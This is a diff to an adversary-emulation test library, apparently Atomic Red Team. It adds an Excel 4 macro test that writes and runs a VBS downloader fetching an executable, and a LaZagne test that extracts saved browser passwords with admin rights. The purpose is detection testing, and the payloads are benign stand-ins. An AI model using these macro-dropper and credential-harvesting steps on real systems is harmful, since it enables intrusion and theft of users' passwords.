+  auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa
   description: Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened.
   supported_platforms:
   - windows
@@ -185,3 +186,95 @@ atomic_tests:
       if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
       Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
     name: powershell
+- name: Excel 4 Macro
+  auto_generated_guid: 
+  description: |
+    This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
+    VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
+
+    A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If
+    you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated
+    with Excel matches that of the local system. This username can be found under Files -> Options -> Username
+  supported_platforms:
+  - windows
+  input_arguments:
+    ms_office_version:
+      description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
+      type: String
+      default: $(((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0])
+    download_url:
+      description: Download URL
+      type: String
+      default: "https://live.sysinternals.com/procexp.exe"
+    uname:
+      description: Username for pathing
+      type: String
+      default: $env:Username
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependent registry keys
+    prereq_command: |
+      If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
+    get_prereq_command: |
+      $xlApp = New-Object -ComObject "Excel.Application"
+      Stop-Process -Name EXCEL
+  executor:
+    command: |
+      $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
+      $fname1 = "$env:TEMP\procexp.exe"
+      if (Test-Path $fname) {
+        Remove-Item $fname
+        Remove-Item $fname1
+      }
+
+      $xlApp = New-Object -COMObject "Excel.Application"
+      $xlApp.Visible = $True
+      $xlApp.DisplayAlerts = $False
+      $xlBook = $xlApp.Workbooks.Add()
+      $sheet = $xlBook.Excel4MacroSheets.Add()
+
+      if ("#{uname}" -ne "") {
+        $sheet.Cells.Item(1,1) = "#{uname}"
+      } else {
+        $sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
+      }
+
+      $sheet.Cells.Item(2,1) = "procexp.exe"
+      $sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
+      $sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
+      $sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
+      $sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
+      $sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
+      $sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
+      $sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
+      $sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
+      $sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
+      $sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
+      $sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
+      $sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
+      $sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
+      $sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
+      $sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
+      $sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
+      $sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
+      $sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
+      $sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
+      $sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
+      $sheet.Cells.Item(23,1) = "=HALT()"
+      $sheet.Cells.Item(1,1).Name = "runme"
+      $xlApp.Run("runme")
+      $xlApp.Quit()
+
+      [System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
+      [System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
+      [System.GC]::Collect()
+      [System.GC]::WaitForPendingFinalizers()
+
+      Remove-Variable xlBook
+      Remove-Variable xlApp
+    cleanup_command: |
+      Stop-Process -Name "procexp*" -ErrorAction Ignore
+      Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
+      Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore
+    name: powershell

atomics/T1555.003/T1555.003.md

@@ -16,6 +16,8 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl
 
 - [Atomic Test #2 - Search macOS Safari Cookies](#atomic-test-2---search-macos-safari-cookies)
 
+- [Atomic Test #3 - LaZagne - Credentials from Browser](#atomic-test-3---lazagne---credentials-from-browser)
+
 
 <br/>
 
@@ -101,4 +103,47 @@ grep -q "#{search_string}" "Cookies.binarycookies"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - LaZagne - Credentials from Browser
+The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system.
+LaZagne is an open source application used to retrieve passwords stored on a local computer.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| lazagne_path | Path to LaZagne | Path | PathToAtomicsFolder&#92;T1555.003&#92;bin&#92;LaZagne.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+#{lazagne_path} browsers
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: LaZagne.exe must exist on disk at specified location (#{lazagne_path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}"
+```
+
+
+
+
 <br/>

atomics/T1555.003/T1555.003.yaml

@@ -51,3 +51,34 @@ atomic_tests:
       cd ~/Library/Cookies
       grep -q "#{search_string}" "Cookies.binarycookies"
     name: sh
+
+- name: LaZagne - Credentials from Browser
+  auto_generated_guid: 9a2915b3-3954-4cce-8c76-00fbf4dbd014
+  description: |
+    The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system.
+    LaZagne is an open source application used to retrieve passwords stored on a local computer. 
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    lazagne_path:
+      description: Path to LaZagne
+      type: Path
+      default: PathToAtomicsFolder\T1555.003\bin\LaZagne.exe
+  
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      LaZagne.exe must exist on disk at specified location (#{lazagne_path})
+    prereq_command: |
+      if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}"
+      
+  executor:
+    name: command_prompt
+    elevation_required: true
+    command: |
+      #{lazagne_path} browsers

atomics/used_guids.txt

@@ -623,3 +623,5 @@ c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef
 f38e9eea-e1d7-4ba6-b716-584791963827
 3723ab77-c546-403c-8fb4-bb577033b235
 60e860b6-8ae6-49db-ad07-5e73edd88f5d
+9215ea92-1ded-41b7-9cd6-79f9a78397aa
+9a2915b3-3954-4cce-8c76-00fbf4dbd014